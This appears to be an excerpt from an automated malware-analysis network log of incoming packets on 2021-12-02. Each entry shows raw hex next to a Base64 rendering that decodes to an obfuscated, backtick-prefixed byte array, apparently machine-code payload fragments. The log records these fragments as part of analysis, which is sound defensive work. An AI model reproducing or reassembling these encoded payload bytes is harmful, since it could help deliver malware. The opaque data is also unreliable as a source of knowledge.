2021-12-02 17:26:37 UTC	1123	IN	Data Raw: 41 78 4e 43 78 67 4e 54 59 73 59 44 55 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 45 59 77 4c 47 41 31 4d 53 78 67 52 54 67 73 59 45 51 34 4c 47 41 78 52 43 78 67 4d 44 45 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 54 55 73 59 44 45 77 4c 47 41 31 4e 69 78 67 4e 54 49 73 59 44 68 45 4c 47 41 30 4e 53 78 67 52 6a 67 73 59 44 55 77 4c 47 42 46 4f 43 78 67 51 30 45 73 59 44 46 45 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 68 43 4c 47 41 30 4e 53 78 67 4d 44 67 73 59 44 68 45 4c 47 41 30 52 43 78 67 52 6a 67 73 59 44 55 78 4c 47 41 34 52 43 78 67 4e 54 55 73 59 45 59 77 4c 47 41 31 4d 69 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 43 78 67 52 54 67 73 59 44 6b 33 4c 47 42 46 52 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 7a 4d 79 78 67 51 7a 6b 73 59 44 67 7a 4c Data Ascii: AxNCxgNTYsYDUwLGA4RCxgNEQsYEYwLGA1MSxgRTgsYEQ4LGAxRCxgMDEsYDAwLGA4QixgNTUsYDEwLGA1NixgNTIsYDhELGA0NSxgRjgsYDUwLGBFOCxgQ0EsYDFELGAwMSxgMDAsYDhCLGA0NSxgMDgsYDhELGA0RCxgRjgsYDUxLGA4RCxgNTUsYEYwLGA1MixgNkEsYDAwLGA1MCxgRTgsYDk3LGBFRCxgMDAsYDAwLGAzMyxgQzksYDgzL
2021-12-02 17:26:37 UTC	1139	IN	Data Raw: 41 31 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4e 43 78 67 52 54 67 73 59 45 4a 43 4c 47 41 35 4d 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 55 7a 4c 47 41 31 4e 79 78 67 52 54 67 73 59 44 5a 47 4c 47 41 35 4d 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 51 53 78 67 4e 45 45 73 59 44 55 32 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 5a 44 4c 47 42 46 4f 43 78 67 51 54 51 73 59 44 6b 79 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4e 44 51 73 59 44 55 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 4d 73 59 44 55 33 4c 47 42 46 4f 43 78 67 4e 54 55 73 59 44 6b 7a 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 5a 42 4c Data Ascii: A1NixgODksYDQ1LGBGNCxgRTgsYEJCLGA5MixgMDAsYDAwLGA1MCxgNkEsYDAwLGA2QSxgMDAsYDUzLGA1NyxgRTgsYDZGLGA5MyxgMDAsYDAwLGA2QSxgNEEsYDU2LGA4OSxgNDUsYEZDLGBFOCxgQTQsYDkyLGAwMCxgMDAsYDgzLGBDNCxgNDQsYDUwLGA2QSxgMDAsYDZBLGAwMCxgNTMsYDU3LGBFOCxgNTUsYDkzLGAwMCxgMDAsYDZBL
2021-12-02 17:26:37 UTC	1155	IN	Data Raw: 41 33 52 43 78 67 4d 44 67 73 59 44 59 34 4c 47 41 34 4d 43 78 67 4d 45 59 73 59 44 41 31 4c 47 42 47 52 43 78 67 4e 54 63 73 59 44 4d 7a 4c 47 42 47 4e 69 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 46 4e 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 46 4f 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 46 51 79 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4d 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4e 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 4f 43 78 67 4f 44 6b 73 59 44 51 31 4c 47 42 47 51 79 78 67 52 54 67 73 59 44 67 77 4c 47 41 79 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 55 51 73 59 44 45 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 41 34 4c 47 41 34 51 69 78 67 4e 45 51 73 59 44 42 44 4c 47 41 34 52 43 78 67 4e 44 55 73 59 45 55 30 4c Data Ascii: A3RCxgMDgsYDY4LGA4MCxgMEYsYDA1LGBGRCxgNTcsYDMzLGBGNixgODksYDQ1LGBFNCxgODksYDQ1LGBFOCxgODksYDQ1LGBFQyxgODksYDQ1LGBGMCxgODksYDQ1LGBGNCxgODksYDQ1LGBGOCxgODksYDQ1LGBGQyxgRTgsYDgwLGAyRixgMDAsYDAwLGA4QixgNUQsYDEwLGA4MyxgQzQsYDA4LGA4QixgNEQsYDBDLGA4RCxgNDUsYEU0L
2021-12-02 17:26:37 UTC	1171	IN	Data Raw: 41 32 4f 43 78 67 4e 54 6b 73 59 44 59 30 4c 47 41 7a 4f 43 78 67 4f 54 45 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 4f 43 78 67 52 54 49 73 59 44 46 42 4c 47 41 30 52 53 78 67 4d 45 49 73 59 45 55 34 4c 47 41 35 4d 53 78 67 52 54 4d 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4e 43 78 67 4e 54 41 73 59 44 67 7a 4c 47 42 44 4e 69 78 67 4d 55 4d 73 59 44 55 32 4c 47 42 46 4f 43 78 67 4e 6a 51 73 59 44 64 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 51 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4e 7a 51 73 59 44 41 35 4c 47 41 34 51 69 78 67 4d 54 63 73 59 44 68 45 4c 47 41 30 52 43 78 67 52 6a 67 73 59 44 55 78 4c 47 41 31 4d 69 78 67 52 6b 59 73 59 45 51 77 4c Data Ascii: A2OCxgNTksYDY0LGAzOCxgOTEsYDZBLGAwMCxgNkEsYDAwLGA2OCxgRTIsYDFBLGA0RSxgMEIsYEU4LGA5MSxgRTMsYDAwLGAwMCxgODMsYEM0LGAwNCxgNTAsYDgzLGBDNixgMUMsYDU2LGBFOCxgNjQsYDdCLGAwMCxgMDAsYDgzLGBDNCxgMTQsYDg1LGBDMCxgNzQsYDA5LGA4QixgMTcsYDhELGA0RCxgRjgsYDUxLGA1MixgRkYsYEQwL
2021-12-02 17:26:37 UTC	1187	IN	Data Raw: 41 77 4d 43 78 67 4f 44 4d 73 59 45 5a 47 4c 47 41 77 4d 53 78 67 4e 7a 59 73 59 44 41 35 4c 47 41 34 4d 79 78 67 52 55 59 73 59 44 41 79 4c 47 41 34 52 43 78 67 4e 44 51 73 59 44 64 43 4c 47 41 77 4d 69 78 67 52 55 49 73 59 44 41 7a 4c 47 41 34 51 69 78 67 4e 44 55 73 59 45 59 34 4c 47 41 34 51 69 78 67 4e 45 51 73 59 44 42 44 4c 47 41 34 4d 79 78 67 52 6a 6b 73 59 44 41 79 4c 47 41 33 4e 53 78 67 4e 6a 63 73 59 44 68 43 4c 47 41 77 4d 43 78 67 4d 30 49 73 59 44 67 32 4c 47 42 45 4e 43 78 67 4d 54 49 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4e 7a 55 73 59 44 4e 43 4c 47 41 34 51 69 78 67 4f 45 55 73 59 45 49 30 4c 47 41 78 4d 69 78 67 4d 44 45 73 59 44 41 77 4c 47 41 77 4d 79 78 67 51 7a 6b 73 59 44 55 78 4c 47 41 34 52 43 78 67 4f 54 59 73 59 45 52 44 4c Data Ascii: AwMCxgODMsYEZGLGAwMSxgNzYsYDA5LGA4MyxgRUYsYDAyLGA4RCxgNDQsYDdCLGAwMixgRUIsYDAzLGA4QixgNDUsYEY4LGA4QixgNEQsYDBDLGA4MyxgRjksYDAyLGA3NSxgNjcsYDhCLGAwMCxgM0IsYDg2LGBENCxgMTIsYDAxLGAwMCxgNzUsYDNCLGA4QixgOEUsYEI0LGAxMixgMDEsYDAwLGAwMyxgQzksYDUxLGA4RCxgOTYsYERDL
2021-12-02 17:26:37 UTC	1203	IN	Data Raw: 41 77 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 79 78 67 4e 54 41 73 59 44 55 32 4c 47 42 46 4f 43 78 67 51 6a 6b 73 59 45 49 35 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 4d 7a 4c 47 42 44 4f 53 78 67 4e 6a 67 73 59 44 41 32 4c 47 41 77 4d 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 53 78 67 4f 45 51 73 59 44 6b 31 4c 47 42 47 51 53 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 49 73 59 45 4d 33 4c 47 41 34 4e 69 78 67 4d 6a 51 73 59 44 42 42 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4e 69 78 67 4f 44 6b 73 59 44 68 45 4c 47 42 47 4f 43 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 54 67 73 59 44 59 30 4c 47 42 45 4d 79 78 67 4d 44 41 73 59 44 41 77 4c Data Ascii: AwQSxgMDAsYDAwLGA1MyxgNTAsYDU2LGBFOCxgQjksYEI5LGAwMCxgMDAsYDMzLGBDOSxgNjgsYDA2LGAwMixgMDAsYDAwLGA1MSxgOEQsYDk1LGBGQSxgRkQsYEZGLGBGRixgNTIsYEM3LGA4NixgMjQsYDBBLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGA2NixgODksYDhELGBGOCxgRkQsYEZGLGBGRixgRTgsYDY0LGBEMyxgMDAsYDAwL
2021-12-02 17:26:37 UTC	1219	IN	Data Raw: 42 47 4f 43 78 67 52 45 4d 73 59 44 63 35 4c 47 42 43 4e 69 78 67 4e 54 55 73 59 44 68 43 4c 47 42 46 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 77 4f 43 78 67 4f 45 49 73 59 44 67 34 4c 47 42 42 4d 43 78 67 4d 45 49 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6a 67 73 59 44 49 32 4c 47 41 30 52 43 78 67 4d 7a 51 73 59 45 45 32 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54 45 73 59 44 67 7a 4c 47 42 44 4d 43 78 67 4d 55 4d 73 59 44 55 77 4c 47 42 46 4f 43 78 67 4e 6a 45 73 59 44 55 33 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 51 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4e 7a 51 73 59 44 41 33 4c 47 41 32 4f 43 78 67 4d 44 4d 73 59 44 67 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 5a 47 4c Data Ascii: BGOCxgREMsYDc5LGBCNixgNTUsYDhCLGBFQyxgOEIsYDQ1LGAwOCxgOEIsYDg4LGBBMCxgMEIsYDAwLGAwMCxgNjgsYDI2LGA0RCxgMzQsYEE2LGA2QSxgMDAsYDZBLGAwMCxgNTEsYDgzLGBDMCxgMUMsYDUwLGBFOCxgNjEsYDU3LGAwMCxgMDAsYDgzLGBDNCxgMTQsYDg1LGBDMCxgNzQsYDA3LGA2OCxgMDMsYDgwLGAwMCxgMDAsYEZGL
2021-12-02 17:26:37 UTC	1235	IN	Data Raw: 41 77 4e 43 78 67 4d 44 41 73 59 44 41 77 4c 47 42 46 4f 43 78 67 4d 30 4d 73 59 45 4a 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 31 52 43 78 67 4d 54 51 73 59 44 4d 7a 4c 47 42 44 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 54 41 73 59 44 55 77 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 4d 33 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 4e 43 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 4e 47 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 51 7a 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 51 33 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 52 43 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 52 47 4c 47 41 34 4f 43 78 67 4e 44 55 73 59 45 55 7a 4c 47 41 34 52 43 78 67 4e 44 55 73 59 45 5a 44 4c 47 41 31 4d 43 78 67 4e 54 59 73 59 44 5a 42 4c Data Ascii: AwNCxgMDAsYDAwLGBFOCxgM0MsYEJCLGAwMCxgMDAsYDhCLGA1RCxgMTQsYDMzLGBDMCxgODMsYEM0LGAwOCxgNTAsYDUwLGA4OSxgNDUsYEM3LGA4OSxgNDUsYENCLGA4OSxgNDUsYENGLGA4OSxgNDUsYEQzLGA4OSxgNDUsYEQ3LGA4OSxgNDUsYERCLGA4OSxgNDUsYERGLGA4OCxgNDUsYEUzLGA4RCxgNDUsYEZDLGA1MCxgNTYsYDZBL
2021-12-02 17:26:37 UTC	1251	IN	Data Raw: 42 45 51 79 78 67 4e 7a 49 73 59 44 41 77 4c 47 41 32 4d 69 78 67 4d 44 41 73 59 45 4d 33 4c 47 41 30 4e 53 78 67 52 54 41 73 59 44 59 35 4c 47 41 77 4d 43 78 67 4e 7a 49 73 59 44 41 77 4c 47 42 44 4e 79 78 67 4e 44 55 73 59 45 55 30 4c 47 41 32 4e 43 78 67 4d 44 41 73 59 44 56 44 4c 47 41 77 4d 43 78 67 4e 6a 59 73 59 44 67 35 4c 47 41 30 4e 53 78 67 52 54 67 73 59 45 55 34 4c 47 42 42 4f 43 78 67 51 6a 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 45 59 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 45 30 4c 47 41 34 4e 53 78 67 52 6a 59 73 59 44 63 31 4c 47 41 77 4e 69 78 67 4e 55 59 73 59 44 56 46 4c 47 41 34 51 69 78 67 52 54 55 73 59 44 56 45 4c 47 42 44 4d 79 78 67 4e 54 4d 73 59 44 5a 42 4c 47 41 77 4f 43 78 67 4f 45 51 73 59 44 52 45 4c Data Ascii: BEQyxgNzIsYDAwLGA2MixgMDAsYEM3LGA0NSxgRTAsYDY5LGAwMCxgNzIsYDAwLGBDNyxgNDUsYEU0LGA2NCxgMDAsYDVDLGAwMCxgNjYsYDg5LGA0NSxgRTgsYEU4LGBBOCxgQjAsYDAwLGAwMCxgOEIsYEYwLGA4MyxgQzQsYDE0LGA4NSxgRjYsYDc1LGAwNixgNUYsYDVFLGA4QixgRTUsYDVELGBDMyxgNTMsYDZBLGAwOCxgOEQsYDREL
2021-12-02 17:26:37 UTC	1267	IN	Data Raw: 42 45 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 7a 4f 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 77 52 69 78 67 4f 44 55 73 59 45 46 46 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 43 78 67 4f 45 49 73 59 44 51 31 4c 47 42 47 4f 43 78 67 4f 45 51 73 59 44 52 45 4c 47 42 47 51 79 78 67 4e 54 45 73 59 44 68 43 4c 47 41 30 52 53 78 67 4d 7a 41 73 59 44 5a 42 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 6b 31 4c 47 42 42 51 79 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 49 73 59 44 55 77 4c 47 42 47 52 69 78 67 52 44 45 73 59 44 67 7a 4c 47 42 44 4e 43 78 67 4d 54 51 73 59 44 67 31 4c 47 42 44 4d 43 78 67 4d 45 59 73 59 44 67 31 4c 47 41 34 51 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 49 73 59 44 55 31 4c Data Ascii: BEMCxgODMsYEM0LGAzOCxgODUsYEMwLGAwRixgODUsYEFFLGAwMCxgMDAsYDAwLGA1MCxgOEIsYDQ1LGBGOCxgOEQsYDRELGBGQyxgNTEsYDhCLGA0RSxgMzAsYDZBLGBGRixgOEQsYDk1LGBBQyxgRkUsYEZGLGBGRixgNTIsYDUwLGBGRixgRDEsYDgzLGBDNCxgMTQsYDg1LGBDMCxgMEYsYDg1LGA4QyxgMDAsYDAwLGAwMCxgOEIsYDU1L
2021-12-02 17:26:37 UTC	1283	IN	Data Raw: 41 77 4d 79 78 67 4f 45 51 73 59 44 51 35 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 6b 31 4c 47 41 77 4d 43 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 6a 67 73 59 44 41 77 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 69 78 67 52 54 67 73 59 44 4a 47 4c 47 41 35 4e 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4e 44 55 73 59 44 45 34 4c 47 41 34 51 69 78 67 4e 54 55 73 59 44 41 34 4c 47 41 31 4d 43 78 67 4f 45 51 73 59 44 68 45 4c 47 41 77 4d 43 78 67 52 6b 55 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 45 73 59 44 55 32 4c 47 41 31 4d 69 78 67 52 54 67 73 59 44 68 42 4c 47 42 47 51 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 34 51 69 78 67 4e 44 4d 73 59 44 45 77 4c 47 41 31 4d 43 78 67 4f 45 51 73 59 44 68 45 4c Data Ascii: AwMyxgOEQsYDQ5LGAwMCxgOEQsYDk1LGAwMCxgRkUsYEZGLGBGRixgNjgsYDAwLGAwMSxgMDAsYDAwLGA1MixgRTgsYDJGLGA5NyxgMDAsYDAwLGA4QixgNDUsYDE4LGA4QixgNTUsYDA4LGA1MCxgOEQsYDhELGAwMCxgRkUsYEZGLGBGRixgNTEsYDU2LGA1MixgRTgsYDhBLGBGQixgRkYsYEZGLGA4QixgNDMsYDEwLGA1MCxgOEQsYDhEL
2021-12-02 17:26:37 UTC	1299	IN	Data Raw: 41 77 4d 53 78 67 4f 44 59 73 59 44 41 34 4c 47 41 77 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 51 69 78 67 4f 44 59 73 59 44 41 30 4c 47 41 77 51 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 68 45 4c 47 41 31 4e 53 78 67 4f 44 41 73 59 44 55 79 4c 47 41 31 4d 43 78 67 52 54 67 73 59 44 56 44 4c 47 41 34 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 52 43 78 67 4e 45 51 73 59 44 67 77 4c 47 41 31 4d 53 78 67 52 54 67 73 59 45 55 7a 4c 47 41 34 52 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 79 78 67 51 7a 41 73 59 44 41 78 4c 47 41 34 4e 69 78 67 4d 44 67 73 59 44 42 42 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 31 4e 79 78 67 4d 44 51 73 59 44 55 79 4c 47 41 31 4e 69 78 67 52 54 67 73 59 44 67 78 4c Data Ascii: AwMSxgODYsYDA4LGAwQSxgMDAsYDAwLGA4QixgODYsYDA0LGAwQSxgMDAsYDAwLGA2QSxgMDAsYDhELGA1NSxgODAsYDUyLGA1MCxgRTgsYDVDLGA4RixgMDAsYDAwLGA4RCxgNEQsYDgwLGA1MSxgRTgsYEUzLGA4RCxgMDAsYDAwLGAwMyxgQzAsYDAxLGA4NixgMDgsYDBBLGAwMCxgMDAsYDhCLGA1NyxgMDQsYDUyLGA1NixgRTgsYDgxL
2021-12-02 17:26:37 UTC	1315	IN	Data Raw: 41 31 4e 79 78 67 4e 54 59 73 59 45 55 34 4c 47 41 32 52 43 78 67 4e 7a 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 67 31 4c 47 42 45 51 79 78 67 52 6b 49 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 41 73 59 45 55 34 4c 47 42 47 4d 53 78 67 4f 44 45 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6a 67 73 59 44 45 35 4c 47 41 77 4d 69 78 67 4d 44 49 73 59 44 41 77 4c 47 41 34 52 43 78 67 4f 45 51 73 59 45 52 44 4c 47 42 47 51 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 31 4d 53 78 67 4f 45 51 73 59 44 55 31 4c 47 42 47 51 79 78 67 4e 54 49 73 59 44 55 32 4c 47 41 34 51 69 78 67 52 6a 67 73 59 45 55 34 4c 47 42 46 4f 53 78 67 4f 54 41 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 79 51 79 78 67 4f 44 55 73 59 45 4d 77 4c Data Ascii: A1NyxgNTYsYEU4LGA2RCxgNzEsYEZGLGBGRixgOEQsYDg1LGBEQyxgRkIsYEZGLGBGRixgNTAsYEU4LGBGMSxgODEsYDAwLGAwMCxgNjgsYDE5LGAwMixgMDIsYDAwLGA4RCxgOEQsYERDLGBGQixgRkYsYEZGLGA1MSxgOEQsYDU1LGBGQyxgNTIsYDU2LGA4QixgRjgsYEU4LGBFOSxgOTAsYEZGLGBGRixgODMsYEM0LGAyQyxgODUsYEMwL
2021-12-02 17:26:37 UTC	1331	IN	Data Raw: 42 47 52 53 78 67 4d 44 6b 73 59 44 63 31 4c 47 41 77 4e 79 78 67 51 6b 49 73 59 44 67 35 4c 47 41 77 4d 53 78 67 4d 54 49 73 59 44 41 77 4c 47 42 46 51 69 78 67 4e 54 51 73 59 44 67 7a 4c 47 42 47 52 53 78 67 4d 45 59 73 59 44 63 30 4c 47 41 30 51 53 78 67 4f 44 4d 73 59 45 5a 46 4c 47 41 77 51 69 78 67 4e 7a 51 73 59 44 51 31 4c 47 41 34 4d 79 78 67 52 6b 55 73 59 44 45 32 4c 47 41 33 4e 53 78 67 4d 44 55 73 59 44 67 35 4c 47 41 31 4e 53 78 67 52 6a 51 73 59 45 56 43 4c 47 41 30 4d 43 78 67 4f 44 4d 73 59 45 5a 46 4c 47 41 77 4f 43 78 67 4e 7a 55 73 59 44 41 31 4c 47 41 34 4f 53 78 67 4e 44 55 73 59 45 59 30 4c 47 42 46 51 69 78 67 4d 7a 45 73 59 44 67 7a 4c 47 42 47 52 53 78 67 4d 54 6b 73 59 44 63 31 4c 47 41 77 4e 53 78 67 4f 44 6b 73 59 44 64 45 4c Data Ascii: BGRSxgMDksYDc1LGAwNyxgQkIsYDg5LGAwMSxgMTIsYDAwLGBFQixgNTQsYDgzLGBGRSxgMEYsYDc0LGA0QSxgODMsYEZFLGAwQixgNzQsYDQ1LGA4MyxgRkUsYDE2LGA3NSxgMDUsYDg5LGA1NSxgRjQsYEVCLGA0MCxgODMsYEZFLGAwOCxgNzUsYDA1LGA4OSxgNDUsYEY0LGBFQixgMzEsYDgzLGBGRSxgMTksYDc1LGAwNSxgODksYDdEL
2021-12-02 17:26:37 UTC	1347	IN	Data Raw: 42 47 52 69 78 67 4d 30 4d 73 59 44 4a 44 4c 47 41 33 4e 43 78 67 51 6a 49 73 59 44 4e 44 4c 47 41 79 52 43 78 67 4d 45 59 73 59 44 67 30 4c 47 41 77 4d 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4f 45 51 73 59 44 55 77 4c 47 42 45 4d 43 78 67 4f 44 41 73 59 45 5a 42 4c 47 41 77 4d 79 78 67 4d 45 59 73 59 44 67 32 4c 47 41 79 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 30 4d 73 59 44 4d 30 4c 47 41 77 52 69 78 67 4f 44 51 73 59 44 51 32 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 7a 51 79 78 67 4d 7a 55 73 59 44 42 47 4c 47 41 34 4e 43 78 67 4e 6a 41 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 68 45 4c 47 41 30 4f 43 78 67 51 7a 67 73 59 44 67 77 4c 47 42 47 4f 53 78 67 4d 44 4d 73 59 44 42 47 4c Data Ascii: BGRixgM0MsYDJDLGA3NCxgQjIsYDNDLGAyRCxgMEYsYDg0LGAwMixgRkYsYEZGLGBGRixgOEQsYDUwLGBEMCxgODAsYEZBLGAwMyxgMEYsYDg2LGAyQyxgRkYsYEZGLGBGRixgM0MsYDM0LGAwRixgODQsYDQ2LGBGRixgRkYsYEZGLGAzQyxgMzUsYDBGLGA4NCxgNjAsYEZGLGBGRixgRkYsYDhELGA0OCxgQzgsYDgwLGBGOSxgMDMsYDBGL
2021-12-02 17:26:37 UTC	1363	IN	Data Raw: 41 32 51 53 78 67 4d 44 41 73 59 44 55 79 4c 47 42 47 52 69 78 67 52 44 41 73 59 44 4d 7a 4c 47 42 44 4f 53 78 67 4e 6a 67 73 59 45 5a 46 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 31 4d 53 78 67 4f 45 51 73 59 44 6b 31 4c 47 42 42 51 53 78 67 52 6b 4d 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4e 54 49 73 59 44 59 32 4c 47 41 34 4f 53 78 67 4f 45 51 73 59 45 45 34 4c 47 42 47 51 79 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 46 4f 43 78 67 4e 7a 51 73 59 44 56 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 4d 7a 4c 47 42 44 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 51 79 78 67 51 7a 63 73 59 44 51 31 4c 47 42 44 4f 43 78 67 4e 6a 6b 73 59 44 41 77 4c 47 41 32 52 43 78 67 4d 44 41 73 59 45 4d 33 4c 47 41 30 4e 53 78 67 51 30 4d 73 59 44 4a 46 4c Data Ascii: A2QSxgMDAsYDUyLGBGRixgRDAsYDMzLGBDOSxgNjgsYEZFLGAwMSxgMDAsYDAwLGA1MSxgOEQsYDk1LGBBQSxgRkMsYEZGLGBGRixgNTIsYDY2LGA4OSxgOEQsYEE4LGBGQyxgRkYsYEZGLGBFOCxgNzQsYDVCLGAwMCxgMDAsYDMzLGBDMCxgODMsYEM0LGAwQyxgQzcsYDQ1LGBDOCxgNjksYDAwLGA2RCxgMDAsYEM3LGA0NSxgQ0MsYDJFL
2021-12-02 17:26:37 UTC	1379	IN	Data Raw: 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 42 43 4e 79 78 67 4e 54 59 73 59 44 68 45 4c 47 41 34 52 69 78 67 4e 6a 6b 73 59 44 45 79 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 55 78 4c 47 41 31 4d 79 78 67 52 54 67 73 59 44 59 79 4c 47 41 31 4e 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 42 44 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 42 42 4d 69 78 67 4e 54 59 73 59 44 68 45 4c 47 41 35 4e 79 78 67 4e 7a 45 73 59 44 45 79 4c 47 41 77 4d 53 78 67 4d 44 41 73 59 44 55 79 4c 47 41 31 4d 79 78 67 52 54 67 73 59 44 52 45 4c 47 41 31 4e 79 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 42 44 4c 47 41 34 4e 53 78 67 51 7a 41 73 59 44 63 31 4c 47 41 34 52 43 78 67 4e 54 59 73 59 44 67 78 4c Data Ascii: A4NSxgQzAsYDc1LGBCNyxgNTYsYDhELGA4RixgNjksYDEyLGAwMSxgMDAsYDUxLGA1MyxgRTgsYDYyLGA1NyxgMDAsYDAwLGA4MyxgQzQsYDBDLGA4NSxgQzAsYDc1LGBBMixgNTYsYDhELGA5NyxgNzEsYDEyLGAwMSxgMDAsYDUyLGA1MyxgRTgsYDRELGA1NyxgMDAsYDAwLGA4MyxgQzQsYDBDLGA4NSxgQzAsYDc1LGA4RCxgNTYsYDgxL
2021-12-02 17:26:37 UTC	1395	IN	Data Raw: 41 7a 4e 43 78 67 4d 6a 67 73 59 45 52 46 4c 47 42 44 51 53 78 67 51 30 49 73 59 44 4d 7a 4c 47 41 32 4d 69 78 67 4d 44 45 73 59 44 45 30 4c 47 42 46 4d 43 78 67 4d 7a 45 73 59 45 55 32 4c 47 42 46 4d 53 78 67 4d 54 63 73 59 44 6b 78 4c 47 41 34 4e 43 78 67 4d 30 51 73 59 45 52 44 4c 47 42 45 52 43 78 67 4e 7a 51 73 59 45 52 46 4c 47 42 45 4f 53 78 67 51 55 55 73 59 45 59 79 4c 47 41 34 52 53 78 67 4f 45 45 73 59 44 59 35 4c 47 41 35 51 69 78 67 4f 54 59 73 59 44 56 43 4c 47 41 78 52 69 78 67 4d 44 41 73 59 44 67 35 4c 47 41 78 4f 53 78 67 4e 6a 51 73 59 44 4d 79 4c 47 41 31 52 53 78 67 4d 54 51 73 59 44 49 31 4c 47 41 78 4d 69 78 67 4e 44 63 73 59 45 52 43 4c 47 41 77 52 69 78 67 4d 55 4d 73 59 45 52 42 4c 47 42 47 52 53 78 67 4f 44 45 73 59 45 4d 34 4c Data Ascii: 